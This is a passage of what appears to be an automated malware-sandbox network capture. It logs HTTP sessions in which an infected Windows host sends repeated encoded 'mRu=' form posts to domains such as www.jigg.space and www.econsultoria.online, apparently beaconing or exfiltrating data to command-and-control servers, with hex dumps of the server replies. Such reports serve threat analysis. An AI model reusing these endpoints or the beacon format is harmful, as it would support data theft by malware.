                                                                                                                            Data Ascii: uSDqsqx8johVV7siWVfXB97/09se+NCRNgkSnUU3WubhvDYwMpfScd/4iymEuvaGW8b8qXecVYeAu4F5z7O3Q5JNLTuZlmkdjBDP5IIvq0iliDZsbfPsGzt+zXyF0rpTTB7NnInVeWyIRoc4ASl65MhSDdcPR70jxRAxL/Erg4HPSO9GaS1Z62TSqBMyfjJSrb+DBHqVLospLwDDIYK60w/Vj5AsNZldnQMBKvCTEGKjnbsZVEY


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            85192.168.11.204980413.248.169.4880
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:34:59.452414036 CET476OUTGET /a18n/?mRu=GNYnn+/HdyV8duRMqtcyXm0xy6A5R7OP0g3qQsxli+rcIWT14zRUDqgxNRAzolcecH8yu9AKKAak4SdSyZ6RvIdAVt2QUT1IwNlPBAoCd8CxXhf8uuYrVNc=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.dreampay.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:34:59.588041067 CET388INHTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Tue, 12 Nov 2024 14:34:59 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 248
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 52 75 3d 47 4e 59 6e 6e 2b 2f 48 64 79 56 38 64 75 52 4d 71 74 63 79 58 6d 30 78 79 36 41 35 52 37 4f 50 30 67 33 71 51 73 78 6c 69 2b 72 63 49 57 54 31 34 7a 52 55 44 71 67 78 4e 52 41 7a 6f 6c 63 65 63 48 38 79 75 39 41 4b 4b 41 61 6b 34 53 64 53 79 5a 36 52 76 49 64 41 56 74 32 51 55 54 31 49 77 4e 6c 50 42 41 6f 43 64 38 43 78 58 68 66 38 75 75 59 72 56 4e 63 3d 26 55 4a 3d 37 48 31 58 4d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mRu=GNYnn+/HdyV8duRMqtcyXm0xy6A5R7OP0g3qQsxli+rcIWT14zRUDqgxNRAzolcecH8yu9AKKAak4SdSyZ6RvIdAVt2QUT1IwNlPBAoCd8CxXhf8uuYrVNc=&UJ=7H1XM"}</script></head></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            86192.168.11.2049805173.255.194.13480
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:35:04.749439001 CET741OUTPOST /wie9/ HTTP/1.1
                                                                                                                            Host: www.jigg.space
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.jigg.space
                                                                                                                            Referer: http://www.jigg.space/wie9/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 6f 4a 54 76 38 41 46 67 51 56 33 45 62 76 39 58 55 58 59 72 4b 59 77 33 76 4e 65 39 6d 31 52 42 71 6d 53 6c 6a 32 2b 4e 7a 52 57 49 31 33 71 31 64 4e 7a 2b 73 78 48 4a 78 65 73 66 76 4f 38 31 76 50 47 62 4f 4a 67 4e 42 6d 53 67 71 78 48 59 51 51 2f 73 32 74 50 52 76 74 74 59 4f 75 58 4b 7a 59 51 49 6e 6a 57 66 36 5a 2b 45 64 76 69 57 50 53 4a 4d 63 39 51 5a 57 31 58 41 67 66 31 6f 2f 43 4d 53 7a 5a 7a 56 59 4f 54 58 6f 49 30 66 77 31 68 66 67 48 47 70 71 71 46 74 73 71 34 73 39 56 48 38 47 46 77 30 69 6e 79 65 30 46 5a 72 6c 4c 4f 44 77 63 38 36 72 6c 71 68 57 2b 52 6f 6e 41 3d 3d
                                                                                                                            Data Ascii: mRu=oJTv8AFgQV3Ebv9XUXYrKYw3vNe9m1RBqmSlj2+NzRWI13q1dNz+sxHJxesfvO81vPGbOJgNBmSgqxHYQQ/s2tPRvttYOuXKzYQInjWf6Z+EdviWPSJMc9QZW1XAgf1o/CMSzZzVYOTXoI0fw1hfgHGpqqFtsq4s9VH8GFw0inye0FZrlLODwc86rlqhW+RonA==
                                                                                                                            Nov 12, 2024 15:35:04.884165049 CET759INHTTP/1.1 403 Forbidden
                                                                                                                            server: openresty/1.13.6.1
                                                                                                                            date: Tue, 12 Nov 2024 14:35:04 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 577
                                                                                                                            x-fail-reason: Bad Actor
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 [TRUNCATED]
                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            87192.168.11.2049806173.255.194.13480
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:35:07.422977924 CET761OUTPOST /wie9/ HTTP/1.1
                                                                                                                            Host: www.jigg.space
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.jigg.space
                                                                                                                            Referer: http://www.jigg.space/wie9/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 6f 4a 54 76 38 41 46 67 51 56 33 45 62 4f 74 58 59 55 41 72 4d 34 77 30 78 64 65 39 73 56 52 2f 71 6d 4f 6c 6a 7a 47 64 7a 69 79 49 31 57 61 31 63 4d 7a 2b 67 52 48 4a 6c 4f 74 56 68 75 38 41 76 50 43 31 4f 49 63 4e 42 6d 47 67 71 7a 66 59 4d 33 4c 74 30 39 50 54 6a 4e 74 61 4b 75 58 4b 7a 59 51 49 6e 6a 43 35 36 66 57 45 63 66 53 57 50 7a 4a 50 41 74 51 65 66 56 58 41 78 50 31 30 2f 43 4e 46 7a 64 7a 7a 59 49 58 58 6f 4a 6b 66 77 6e 4a 63 7a 6e 47 76 30 61 45 46 39 71 68 65 38 52 50 42 4f 56 38 6b 36 69 36 6e 38 7a 55 78 34 35 36 6e 7a 50 67 49 76 56 54 4a 55 38 51 7a 36 4b 55 58 4c 5a 6e 6a 58 33 55 77 5a 32 49 54 79 7a 50 53 6d 6b 30 3d
                                                                                                                            Data Ascii: mRu=oJTv8AFgQV3EbOtXYUArM4w0xde9sVR/qmOljzGdziyI1Wa1cMz+gRHJlOtVhu8AvPC1OIcNBmGgqzfYM3Lt09PTjNtaKuXKzYQInjC56fWEcfSWPzJPAtQefVXAxP10/CNFzdzzYIXXoJkfwnJcznGv0aEF9qhe8RPBOV8k6i6n8zUx456nzPgIvVTJU8Qz6KUXLZnjX3UwZ2ITyzPSmk0=
                                                                                                                            Nov 12, 2024 15:35:07.558279037 CET759INHTTP/1.1 403 Forbidden
                                                                                                                            server: openresty/1.13.6.1
                                                                                                                            date: Tue, 12 Nov 2024 14:35:07 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 577
                                                                                                                            x-fail-reason: Bad Actor
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 [TRUNCATED]
                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            88192.168.11.2049807173.255.194.13480
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:35:10.092005014 CET1289OUTPOST /wie9/ HTTP/1.1
                                                                                                                            Host: www.jigg.space
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.jigg.space
                                                                                                                            Referer: http://www.jigg.space/wie9/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 6f 4a 54 76 38 41 46 67 51 56 33 45 62 4f 74 58 59 55 41 72 4d 34 77 30 78 64 65 39 73 56 52 2f 71 6d 4f 6c 6a 7a 47 64 7a 69 36 49 31 41 4f 31 64 76 62 2b 68 52 48 4a 6d 4f 74 55 68 75 38 6e 76 4c 75 78 4f 49 51 37 42 6a 43 67 72 53 2f 59 63 46 6a 74 39 39 50 54 38 39 74 5a 4f 75 58 66 7a 59 41 45 6e 6a 53 35 36 66 57 45 63 63 4b 57 47 43 4a 50 43 74 51 5a 57 31 58 63 67 66 31 49 2f 43 46 56 7a 64 33 38 59 34 33 58 6f 6f 55 66 6a 69 56 63 77 48 47 74 31 61 45 64 39 71 64 46 38 52 37 33 4f 56 59 4b 36 6c 47 6e 2b 79 73 72 71 34 43 49 70 74 6f 34 6c 55 6e 44 44 71 51 4e 6c 36 34 50 4b 36 4c 44 57 42 49 6a 66 6b 59 6d 6e 78 36 56 6b 51 77 69 42 6e 35 70 59 72 76 39 6b 4c 52 77 52 74 50 44 54 73 68 54 4d 2b 30 5a 53 76 51 6c 52 2b 2b 39 4f 45 49 4a 35 6e 6a 59 55 2f 41 59 6c 73 47 48 71 64 52 44 53 37 46 4c 75 59 54 65 66 78 6e 47 4c 46 43 46 74 41 63 47 71 4d 72 42 32 39 4c 69 39 77 6f 66 62 67 66 41 68 56 31 56 5a 71 43 56 74 50 58 78 53 4d 66 72 66 6e 54 55 69 77 57 2f 4b 53 59 38 73 53 [TRUNCATED]
                                                                                                                            Data Ascii: mRu=oJTv8AFgQV3EbOtXYUArM4w0xde9sVR/qmOljzGdzi6I1AO1dvb+hRHJmOtUhu8nvLuxOIQ7BjCgrS/YcFjt99PT89tZOuXfzYAEnjS56fWEccKWGCJPCtQZW1Xcgf1I/CFVzd38Y43XooUfjiVcwHGt1aEd9qdF8R73OVYK6lGn+ysrq4CIpto4lUnDDqQNl64PK6LDWBIjfkYmnx6VkQwiBn5pYrv9kLRwRtPDTshTM+0ZSvQlR++9OEIJ5njYU/AYlsGHqdRDS7FLuYTefxnGLFCFtAcGqMrB29Li9wofbgfAhV1VZqCVtPXxSMfrfnTUiwW/KSY8sS+bavf1nRI6nnwmCZ8O21H98NH7aWSUIgttjdgpC74RtdWCUp4SX3PFRfuPMU0UiVKYMqRWsYGcE5h3NKudijqnEAeHarxFvBUyg/tTGtM3EiQSGbcs/vglAXC/KVh1Z7rNYe7iSfE4tzuMJukzTU2vB5gfwKTeF8ziV7WlgQsT1EA1iTi36jhXgH+xW57zht8CB4oLZ1YNkEQB96oM1AuOuaenFrgp8ZBODnyTzvr/mcm6p+R2yJLmDA9agzw/5vZQ3ywpgeH7SCVO9MtK1oZ6toYjGhqdf2dpman3ky8eNsUmf+18EfR2v9DHfMOkJ/dYCbhxK+/MteWLvyqfqEnZWj1mzTR8fW/ihqIr6qTveVQ4dIJs/OazHCkzgmPZ2qZcfwBAQijyllvfOeerPg/xph+
                                                                                                                            Nov 12, 2024 15:35:10.092051983 CET5156OUTData Raw: 4b 46 43 6b 32 59 45 47 37 30 35 65 42 62 32 6b 38 68 6f 48 6e 51 4c 50 35 6c 72 70 44 77 54 77 4a 50 31 33 56 66 67 58 55 76 37 6f 4a 67 41 50 67 76 75 38 39 46 70 77 6b 65 43 36 35 75 49 2f 4f 49 72 55 49 61 42 54 4c 72 4a 71 31 32 75 43 2f 72
                                                                                                                            Data Ascii: KFCk2YEG705eBb2k8hoHnQLP5lrpDwTwJP13VfgXUv7oJgAPgvu89FpwkeC65uI/OIrUIaBTLrJq12uC/rzzuebVSL01k/7wIqwYS4Xxil7zfPuJAatd2DoQue0S9qFtp4qc/ItkY+m2gRHnMSDz9cXGfTgRoE3Jg64iDuD7xkc5ausWENONx9t3e3IOFzETsG+lbqultLZ9WyraLbwSg4AEubIF9C+9b8t9Pi3dYXBbzSu+gRg
                                                                                                                            Nov 12, 2024 15:35:10.092098951 CET1289OUTData Raw: 4f 33 76 65 43 30 67 75 73 66 4e 4f 63 75 6e 74 38 47 66 47 4a 39 70 53 65 73 39 4e 77 41 47 44 64 50 4d 38 4e 76 4d 47 68 34 6b 55 52 41 7a 72 48 76 6d 34 54 50 74 75 76 77 64 6f 4a 39 76 42 31 6d 73 43 44 38 43 36 47 6e 69 4b 2f 45 53 6c 52 6f
                                                                                                                            Data Ascii: O3veC0gusfNOcunt8GfGJ9pSes9NwAGDdPM8NvMGh4kURAzrHvm4TPtuvwdoJ9vB1msCD8C6GniK/ESlRo5m4ntyv14mo00qqBz3MSnrVj3hTC6881hFwqsToUlhSGvIXHBIO9sp8JtzIq3HeKE8W+lYUliGDpmVp0NGgHITug++SkqHw8yCNa1ZQ4re0UkxYywWnHvL7laVyKBeJk4AJ9x6grwxtdTMun/XjO7kkZixjcDYFzm
                                                                                                                            Nov 12, 2024 15:35:10.092307091 CET176OUTData Raw: 6c 59 71 49 4f 76 72 79 46 65 35 41 6f 4c 49 52 55 46 79 4c 45 37 30 71 44 4e 30 6b 55 2b 45 37 42 30 79 4b 59 61 50 38 6c 6c 55 69 2b 2f 6e 74 2f 55 67 78 65 6e 78 45 6f 4d 74 6c 63 57 6e 59 54 6b 7a 57 75 4b 6e 2b 67 57 45 2b 70 74 4a 6d 41 4d
                                                                                                                            Data Ascii: lYqIOvryFe5AoLIRUFyLE70qDN0kU+E7B0yKYaP8llUi+/nt/UgxenxEoMtlcWnYTkzWuKn+gWE+ptJmAMCOj5tIhLedj9Do7WDZnsPkcVZznX6d/bgpKy+3Wh2kyPOUT+tc7+7j4Dgc89C6ZiuWuXNth9gnRQ9oQF7kaLhGMGf9zg==
                                                                                                                            Nov 12, 2024 15:35:10.226948023 CET299INHTTP/1.1 200 OK
                                                                                                                            server: openresty/1.13.6.1
                                                                                                                            date: Tue, 12 Nov 2024 14:35:10 GMT
                                                                                                                            content-type: application/octet-stream
                                                                                                                            content-length: 110
                                                                                                                            content-type: text/html
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6a 69 67 67 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 77 77 77 2e 6a 69 67 67 2e 73 70 61 63 65 3c 2f 68 31 3e 3c 70 3e 43 6f 6d 69 6e 67 20 73 6f 6f 6e 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <html><head><title>www.jigg.space</title></head><body><h1>www.jigg.space</h1><p>Coming soon.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            89192.168.11.2049808173.255.194.13480
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:35:12.760833979 CET473OUTGET /wie9/?mRu=lL7P/0JUYVbqWckkUFA5AZs0yLHF2CZptxiRtFaWww2Jt1+4Ybj8qDPeqsoco5xM//SPE5hjfF332jPzZ07z97WSr/ctCPXD3Kda+wiI2ZiEZuGqb25QMsE=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.jigg.space
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:35:12.896985054 CET299INHTTP/1.1 200 OK
                                                                                                                            server: openresty/1.13.6.1
                                                                                                                            date: Tue, 12 Nov 2024 14:35:12 GMT
                                                                                                                            content-type: application/octet-stream
                                                                                                                            content-length: 110
                                                                                                                            content-type: text/html
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6a 69 67 67 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 77 77 77 2e 6a 69 67 67 2e 73 70 61 63 65 3c 2f 68 31 3e 3c 70 3e 43 6f 6d 69 6e 67 20 73 6f 6f 6e 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <html><head><title>www.jigg.space</title></head><body><h1>www.jigg.space</h1><p>Coming soon.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            90192.168.11.20498093.33.130.19080
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:35:18.046612978 CET768OUTPOST /cbd3/ HTTP/1.1
                                                                                                                            Host: www.econsultoria.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.econsultoria.online
                                                                                                                            Referer: http://www.econsultoria.online/cbd3/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 4b 55 58 46 64 64 69 6a 63 73 36 51 6c 59 36 6e 67 39 59 30 69 4f 68 49 73 6c 73 72 66 4b 66 49 33 78 42 37 2f 63 48 4e 62 57 79 70 58 50 33 75 5a 30 61 46 71 44 4a 76 74 35 61 37 34 30 54 34 53 46 46 2b 44 33 78 42 57 33 41 44 7a 64 43 72 48 32 46 62 64 6b 69 43 63 33 4a 6e 77 43 70 38 6d 5a 6d 4f 6d 42 39 79 67 30 4e 4a 6a 2f 76 5a 53 46 50 30 54 4d 71 4e 4e 76 66 46 31 65 56 56 36 49 6a 52 6d 65 67 2b 6a 59 6d 64 4a 4a 66 4c 72 6e 59 6b 71 6a 72 34 72 6c 62 33 62 4b 30 53 74 36 78 54 4e 41 61 4d 4f 39 69 46 67 6f 43 4c 4d 47 72 2b 76 4b 7a 62 41 30 6d 39 33 74 75 59 4c 51 3d 3d
                                                                                                                            Data Ascii: mRu=KUXFddijcs6QlY6ng9Y0iOhIslsrfKfI3xB7/cHNbWypXP3uZ0aFqDJvt5a740T4SFF+D3xBW3ADzdCrH2FbdkiCc3JnwCp8mZmOmB9yg0NJj/vZSFP0TMqNNvfF1eVV6IjRmeg+jYmdJJfLrnYkqjr4rlb3bK0St6xTNAaMO9iFgoCLMGr+vKzbA0m93tuYLQ==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            91192.168.11.20498103.33.130.19080
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:35:20.702032089 CET788OUTPOST /cbd3/ HTTP/1.1
                                                                                                                            Host: www.econsultoria.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.econsultoria.online
                                                                                                                            Referer: http://www.econsultoria.online/cbd3/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 4b 55 58 46 64 64 69 6a 63 73 36 51 6b 35 4b 6e 69 63 59 30 67 75 68 4c 31 56 73 72 4b 61 65 50 33 78 64 37 2f 64 7a 64 63 6a 61 70 58 75 48 75 61 78 75 46 76 44 4a 76 31 70 61 2b 6c 45 54 7a 53 46 5a 4d 44 31 31 42 57 33 38 44 7a 59 2b 72 48 6e 46 59 66 30 69 41 51 58 4a 66 2b 69 70 38 6d 5a 6d 4f 6d 42 70 63 67 30 56 4a 6a 50 2f 5a 51 6b 50 33 51 4d 71 4f 64 2f 66 46 78 65 56 52 36 49 6a 7a 6d 62 4a 70 6a 61 65 64 4a 4d 6a 4c 72 32 59 6e 2f 54 72 2b 6c 46 61 79 59 59 39 31 71 70 6c 73 63 78 75 2f 49 75 53 76 68 2b 50 52 52 30 66 61 73 5a 76 70 45 45 66 56 31 76 76 44 57 5a 41 6c 55 5a 49 52 67 36 79 39 4d 77 67 6b 46 63 45 56 73 44 34 3d
                                                                                                                            Data Ascii: mRu=KUXFddijcs6Qk5KnicY0guhL1VsrKaeP3xd7/dzdcjapXuHuaxuFvDJv1pa+lETzSFZMD11BW38DzY+rHnFYf0iAQXJf+ip8mZmOmBpcg0VJjP/ZQkP3QMqOd/fFxeVR6IjzmbJpjaedJMjLr2Yn/Tr+lFayYY91qplscxu/IuSvh+PRR0fasZvpEEfV1vvDWZAlUZIRg6y9MwgkFcEVsD4=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            92192.168.11.20498113.33.130.19080
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:35:23.354790926 CET2578OUTPOST /cbd3/ HTTP/1.1
                                                                                                                            Host: www.econsultoria.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.econsultoria.online
                                                                                                                            Referer: http://www.econsultoria.online/cbd3/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
